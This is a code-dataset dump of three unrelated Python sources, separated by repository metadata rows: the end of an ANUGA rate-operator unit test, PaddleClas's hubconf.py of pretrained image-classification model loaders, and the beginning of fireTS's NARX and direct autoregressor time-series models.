assert num.allclose(Q_ex, Q)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 0.0)
assert num.allclose(float(rr[2]), 0.0)
assert num.allclose(float(rr[3]), 0.0)
def test_rate_operator_functions_empty_region(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0.0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
indices = []
region = anuga.Region(domain,indices=indices)
factor = 10.0
def main_spatial_rate(x,y,t):
# x and y should be an n by 1 array
return x + y
default_rate = 0.0
domain.tri_full_flag[0] = 0
operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor, \
region=region, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
t = operator.get_time()
Q = operator.get_Q()
x = operator.coord_c[indices,0]
y = operator.coord_c[indices,1]
rate = main_spatial_rate(x,y,t)*factor
Q_ex = num.sum(domain.areas[indices]*rate)
d = operator.get_timestep()*rate + 1
# print Q_ex, Q
# print indices
# print "d"
# print d
stage_ex = num.array([ 1.0, 1.0, 1.0, 1.0])
stage_ex[indices] = d
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(Q_ex, Q)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 0.0)
assert num.allclose(float(rr[2]), 0.0)
assert num.allclose(float(rr[3]), 0.0)
if __name__ == "__main__":
suite = unittest.makeSuite(Test_rate_operators, 'test_rate_operator_functions_rate_default_rate')
runner = unittest.TextTestRunner(verbosity=1)
runner.run(suite)
| 33.008174 | 126 | 0.584723 | 4,674 | 36,342 | 4.409071 | 0.059264 | 0.015625 | 0.079193 | 0.087345 | 0.880774 | 0.864713 | 0.850155 | 0.827785 | 0.817983 | 0.815217 | 0 | 0.039761 | 0.276815 | 36,342 | 1,100 | 127 | 33.038182 | 0.74435 | 0.140334 | 0 | 0.774924 | 0 | 0 | 0.064673 | 0.020936 | 0 | 0 | 0 | 0 | 0.145015 | 1 | 0.028701 | false | 0.004532 | 0.086103 | 0.007553 | 0.125378 | 0.10574 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7f76745ae0654ea41c0cdc2ac2087e4797eb241 | 28,095 | py | Python | hubconf.py | zhusonghe/PaddleClas-1 | e2e492f9c78ed5084cc50d7c45eef4cc41e1eeaf | [
"Apache-2.0"
] | 3,763 | 2020-04-10T04:48:11.000Z | 2022-03-31T13:24:37.000Z | hubconf.py | zhusonghe/PaddleClas-1 | e2e492f9c78ed5084cc50d7c45eef4cc41e1eeaf | [
"Apache-2.0"
] | 633 | 2020-04-08T18:27:31.000Z | 2022-03-31T01:09:43.000Z | hubconf.py | zhusonghe/PaddleClas-1 | e2e492f9c78ed5084cc50d7c45eef4cc41e1eeaf | [
"Apache-2.0"
] | 846 | 2020-04-08T08:13:18.000Z | 2022-03-31T12:28:37.000Z | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
dependencies = ['paddle']
import paddle
import os
import sys
class _SysPathG(object):
"""
_SysPathG used to add/clean path for sys.path. Making sure minimal pkgs dependents by skiping parent dirs.
__enter__
add path into sys.path
__exit__
clean user's sys.path to avoid unexpect behaviors
"""
def __init__(self, path):
self.path = path
def __enter__(self, ):
sys.path.insert(0, self.path)
def __exit__(self, type, value, traceback):
_p = sys.path.pop(0)
assert _p == self.path, 'Make sure sys.path cleaning {} correctly.'.format(
self.path)
with _SysPathG(os.path.dirname(os.path.abspath(__file__)), ):
import ppcls
import ppcls.arch.backbone as backbone
def ppclas_init():
if ppcls.utils.logger._logger is None:
ppcls.utils.logger.init_logger()
ppclas_init()
def _load_pretrained_parameters(model, name):
url = 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/{}_pretrained.pdparams'.format(
name)
path = paddle.utils.download.get_weights_path_from_url(url)
model.set_state_dict(paddle.load(path))
return model
def alexnet(pretrained=False, **kwargs):
"""
AlexNet
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `AlexNet` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.AlexNet(**kwargs)
return model
def vgg11(pretrained=False, **kwargs):
"""
VGG11
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False`
Returns:
model: nn.Layer. Specific `VGG11` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.VGG11(**kwargs)
return model
def vgg13(pretrained=False, **kwargs):
"""
VGG13
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False`
Returns:
model: nn.Layer. Specific `VGG13` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.VGG13(**kwargs)
return model
def vgg16(pretrained=False, **kwargs):
"""
VGG16
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False`
Returns:
model: nn.Layer. Specific `VGG16` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.VGG16(**kwargs)
return model
def vgg19(pretrained=False, **kwargs):
"""
VGG19
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False`
Returns:
model: nn.Layer. Specific `VGG19` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.VGG19(**kwargs)
return model
def resnet18(pretrained=False, **kwargs):
"""
ResNet18
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
input_image_channel: int=3. The number of input image channels
data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC')
Returns:
model: nn.Layer. Specific `ResNet18` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNet18(**kwargs)
return model
def resnet34(pretrained=False, **kwargs):
"""
ResNet34
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
input_image_channel: int=3. The number of input image channels
data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC')
Returns:
model: nn.Layer. Specific `ResNet34` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNet34(**kwargs)
return model
def resnet50(pretrained=False, **kwargs):
"""
ResNet50
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
input_image_channel: int=3. The number of input image channels
data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC')
Returns:
model: nn.Layer. Specific `ResNet50` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNet50(**kwargs)
return model
def resnet101(pretrained=False, **kwargs):
"""
ResNet101
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
input_image_channel: int=3. The number of input image channels
data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC')
Returns:
model: nn.Layer. Specific `ResNet101` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNet101(**kwargs)
return model
def resnet152(pretrained=False, **kwargs):
"""
ResNet152
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
input_image_channel: int=3. The number of input image channels
data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC')
Returns:
model: nn.Layer. Specific `ResNet152` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNet152(**kwargs)
return model
def squeezenet1_0(pretrained=False, **kwargs):
"""
SqueezeNet1_0
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `SqueezeNet1_0` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.SqueezeNet1_0(**kwargs)
return model
def squeezenet1_1(pretrained=False, **kwargs):
"""
SqueezeNet1_1
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `SqueezeNet1_1` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.SqueezeNet1_1(**kwargs)
return model
def densenet121(pretrained=False, **kwargs):
"""
DenseNet121
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
dropout: float=0. Probability of setting units to zero.
bn_size: int=4. The number of channals per group
Returns:
model: nn.Layer. Specific `DenseNet121` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DenseNet121(**kwargs)
return model
def densenet161(pretrained=False, **kwargs):
"""
DenseNet161
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
dropout: float=0. Probability of setting units to zero.
bn_size: int=4. The number of channals per group
Returns:
model: nn.Layer. Specific `DenseNet161` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DenseNet161(**kwargs)
return model
def densenet169(pretrained=False, **kwargs):
"""
DenseNet169
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
dropout: float=0. Probability of setting units to zero.
bn_size: int=4. The number of channals per group
Returns:
model: nn.Layer. Specific `DenseNet169` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DenseNet169(**kwargs)
return model
def densenet201(pretrained=False, **kwargs):
"""
DenseNet201
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
dropout: float=0. Probability of setting units to zero.
bn_size: int=4. The number of channals per group
Returns:
model: nn.Layer. Specific `DenseNet201` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DenseNet201(**kwargs)
return model
def densenet264(pretrained=False, **kwargs):
"""
DenseNet264
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
dropout: float=0. Probability of setting units to zero.
bn_size: int=4. The number of channals per group
Returns:
model: nn.Layer. Specific `DenseNet264` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DenseNet264(**kwargs)
return model
def inceptionv3(pretrained=False, **kwargs):
"""
InceptionV3
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `InceptionV3` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.InceptionV3(**kwargs)
return model
def inceptionv4(pretrained=False, **kwargs):
"""
InceptionV4
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `InceptionV4` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.InceptionV4(**kwargs)
return model
def googlenet(pretrained=False, **kwargs):
"""
GoogLeNet
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `GoogLeNet` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.GoogLeNet(**kwargs)
return model
def shufflenetv2_x0_25(pretrained=False, **kwargs):
"""
ShuffleNetV2_x0_25
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ShuffleNetV2_x0_25` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ShuffleNetV2_x0_25(**kwargs)
return model
def mobilenetv1(pretrained=False, **kwargs):
"""
MobileNetV1
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV1` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV1(**kwargs)
return model
def mobilenetv1_x0_25(pretrained=False, **kwargs):
"""
MobileNetV1_x0_25
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV1_x0_25` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV1_x0_25(**kwargs)
return model
def mobilenetv1_x0_5(pretrained=False, **kwargs):
"""
MobileNetV1_x0_5
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV1_x0_5` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV1_x0_5(**kwargs)
return model
def mobilenetv1_x0_75(pretrained=False, **kwargs):
"""
MobileNetV1_x0_75
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV1_x0_75` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV1_x0_75(**kwargs)
return model
def mobilenetv2_x0_25(pretrained=False, **kwargs):
"""
MobileNetV2_x0_25
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV2_x0_25` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV2_x0_25(**kwargs)
return model
def mobilenetv2_x0_5(pretrained=False, **kwargs):
"""
MobileNetV2_x0_5
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV2_x0_5` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV2_x0_5(**kwargs)
return model
def mobilenetv2_x0_75(pretrained=False, **kwargs):
"""
MobileNetV2_x0_75
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV2_x0_75` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV2_x0_75(**kwargs)
return model
def mobilenetv2_x1_5(pretrained=False, **kwargs):
"""
MobileNetV2_x1_5
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV2_x1_5` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV2_x1_5(**kwargs)
return model
def mobilenetv2_x2_0(pretrained=False, **kwargs):
"""
MobileNetV2_x2_0
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV2_x2_0` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV2_x2_0(**kwargs)
return model
def mobilenetv3_large_x0_35(pretrained=False, **kwargs):
"""
MobileNetV3_large_x0_35
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_large_x0_35` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_large_x0_35(**kwargs)
return model
def mobilenetv3_large_x0_5(pretrained=False, **kwargs):
"""
MobileNetV3_large_x0_5
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_large_x0_5` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_large_x0_5(**kwargs)
return model
def mobilenetv3_large_x0_75(pretrained=False, **kwargs):
"""
MobileNetV3_large_x0_75
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_large_x0_75` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_large_x0_75(**kwargs)
return model
def mobilenetv3_large_x1_0(pretrained=False, **kwargs):
"""
MobileNetV3_large_x1_0
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_large_x1_0` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_large_x1_0(**kwargs)
return model
def mobilenetv3_large_x1_25(pretrained=False, **kwargs):
"""
MobileNetV3_large_x1_25
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_large_x1_25` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_large_x1_25(**kwargs)
return model
def mobilenetv3_small_x0_35(pretrained=False, **kwargs):
"""
MobileNetV3_small_x0_35
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x0_35` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x0_35(**kwargs)
return model
def mobilenetv3_small_x0_5(pretrained=False, **kwargs):
"""
MobileNetV3_small_x0_5
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x0_5` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x0_5(**kwargs)
return model
def mobilenetv3_small_x0_75(pretrained=False, **kwargs):
"""
MobileNetV3_small_x0_75
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x0_75` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x0_75(**kwargs)
return model
def mobilenetv3_small_x1_0(pretrained=False, **kwargs):
"""
MobileNetV3_small_x1_0
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x1_0` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x1_0(**kwargs)
return model
def mobilenetv3_small_x1_25(pretrained=False, **kwargs):
"""
MobileNetV3_small_x1_25
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x1_25` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x1_25(**kwargs)
return model
def resnext101_32x4d(pretrained=False, **kwargs):
"""
ResNeXt101_32x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt101_32x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt101_32x4d(**kwargs)
return model
def resnext101_64x4d(pretrained=False, **kwargs):
"""
ResNeXt101_64x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt101_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt101_64x4d(**kwargs)
return model
def resnext152_32x4d(pretrained=False, **kwargs):
"""
ResNeXt152_32x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt152_32x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt152_32x4d(**kwargs)
return model
def resnext152_64x4d(pretrained=False, **kwargs):
"""
ResNeXt152_64x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt152_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt152_64x4d(**kwargs)
return model
def resnext50_32x4d(pretrained=False, **kwargs):
"""
ResNeXt50_32x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt50_32x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt50_32x4d(**kwargs)
return model
def resnext50_64x4d(pretrained=False, **kwargs):
"""
ResNeXt50_64x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt50_64x4d(**kwargs)
return model
def darknet53(pretrained=False, **kwargs):
"""
DarkNet53
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.DarkNet53(**kwargs)
return model
| 35.608365 | 145 | 0.5958 | 3,046 | 28,095 | 5.380171 | 0.076822 | 0.041006 | 0.070295 | 0.065963 | 0.813583 | 0.781181 | 0.745668 | 0.71351 | 0.71351 | 0.71351 | 0 | 0.04152 | 0.310767 | 28,095 | 788 | 146 | 35.653553 | 0.804792 | 0.529027 | 0 | 0.443925 | 0 | 0.004673 | 0.061808 | 0 | 0 | 0 | 0 | 0 | 0.004673 | 1 | 0.242991 | false | 0 | 0.023364 | 0 | 0.495327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7f95d774f7ccc47ac786680a9d060297c9acf19 | 9,592 | py | Python | fireTS/models.py | ballcap231/fireTS | 74cc89a14d67edabf31139d1552025d54791f2a9 | [
"MIT"
] | null | null | null | fireTS/models.py | ballcap231/fireTS | 74cc89a14d67edabf31139d1552025d54791f2a9 | [
"MIT"
] | null | null | null | fireTS/models.py | ballcap231/fireTS | 74cc89a14d67edabf31139d1552025d54791f2a9 | [
"MIT"
] | null | null | null | from fireTS.core import GeneralAutoRegressor
from sklearn.utils.validation import check_X_y
from sklearn.metrics.regression import r2_score, mean_squared_error
import numpy as np
class NARX(GeneralAutoRegressor):
r"""
NARX stands for `Nonlinear AutoRegressive eXogenous model
<https://en.wikipedia.org/wiki/Nonlinear_autoregressive_exogenous_model>`_.
The model equation is written as follows.
.. math::
y(t + 1) &=& f(y(t), ..., y(t-p+1), \\
& & x_1(t - d_1), ..., x_1(t-d_1-q_1+1), \\
& & ..., x_m(t - d_1), ..., x_m(t - d_m - q_m + 1)) + e(t)
:label: narx
:param object base_estimator: an estimator object that implements the
scikit-learn API (fit, and predict). The
estimator will be used to fit the function
:math:`f` in equation :eq:`narx`.
:param int auto_order: the autoregression order :math:`p` in equation
:eq:`narx`.
:param list exog_order: the exogenous input order, a list of integers
representing the order for each exogenous input,
i.e. :math:`[q_1, q_2, ..., q_m]` in equation
:eq:`narx`.
:param list exog_delay: the delays of the exogenous inputs, a list of
integers representing the delay of each exogenous
input, i.e. :math:`[d_1, d_2, ..., d_m]` in
equation :eq:`narx`. By default, all the delays are
set to 0.
:param dict base_params: other keyword arguments for base_estimator.
"""
def __init__(self,
base_estimator,
auto_order,
exog_order,
exog_delay=None,
**base_params):
super(NARX, self).__init__(
base_estimator,
auto_order,
exog_order,
exog_delay=exog_delay,
pred_step=1,
**base_params)
def score(self, X, y, step=1, method="r2"):
"""
Produce multi-step prediction of y, and compute the metrics against y.
Nan is ignored when computing the metrics.
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param int step: prediction step.
:param string method: could be "r2" (R Square) or "mse" (Mean Square
Error).
:return: prediction metric. Nan is ignored when computing the metrics.
"""
ypred = self.predict(X, y, step=step)
mask = np.isnan(y) | np.isnan(ypred)
if method == "r2":
return r2_score(y[~mask], ypred[~mask])
elif method == "mse":
return mean_squared_error(y[~mask], ypred[~mask])
# TODO: add forecast method
def predict(self, X, y, step=1):
r"""
Produce multi-step prediction of y. The multi-step prediction is done
recursively by using the future inputs in X. The prediction equation is
as follows:
.. math::
\hat{y}(t + k) &=& f(\hat{y}(t + k - 1), ..., \hat{y}(t + k - p), \\
& &x_1(t + k - 1 - d_1), ..., x_1(t + k - d_1 - q_1) \\
& &..., x_m(t + k - 1 - d_m), ..., x_m(t + k - d_m - q_m))
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param int step: prediction step.
:return: k-step prediction time series, shape = (n_samples). The
:math:`i` th value of the output is the k-step prediction of
the :math:`i` th value of the input ``y``. The first ``step +
max(auto_order - 1, max(exog_order + exog_delay) - 1)`` values of the
output is ``np.nan``.
"""
# TODO: this allows nan in X and y, but might need more error checking
X, y = np.array(X), np.array(y)
if len(self.exog_order) != X.shape[1]:
raise ValueError(
'The number of columns of X must be the same as the length of exog_order.'
)
p = self._get_lag_feature_processor(X, y)
features = p.generate_lag_features()
for k in range(step):
yhat = self._predictNA(features)
if k == step - 1:
break
features = p.update(yhat)
ypred = np.concatenate([np.empty(step) * np.nan, yhat])[0:len(y)]
return ypred
class DirectAutoRegressor(GeneralAutoRegressor):
r"""
This model performs autoregression with exogenous inputs on the k-step
ahead output directly. The model equation is written as follows.
.. math::
y(t + k) &=& f(y(t), ..., y(t-p+1), \\
& & x_1(t - d_1), ..., x_1(t-d_1-q_1+1), \\
& & ..., x_m(t - d_1), ..., x_m(t - d_m - q_m + 1)) + e(t)
:label: direct
:param object base_estimator: an estimator object that implements the
scikit-learn API (fit, and predict). The
estimator will be used to fit the function
:math:`f` in equation :eq:`direct`.
:param int auto_order: the autoregression order :math:`p` in equation
:eq:`direct`.
:param list exog_order: the exogenous input order, a list of integers
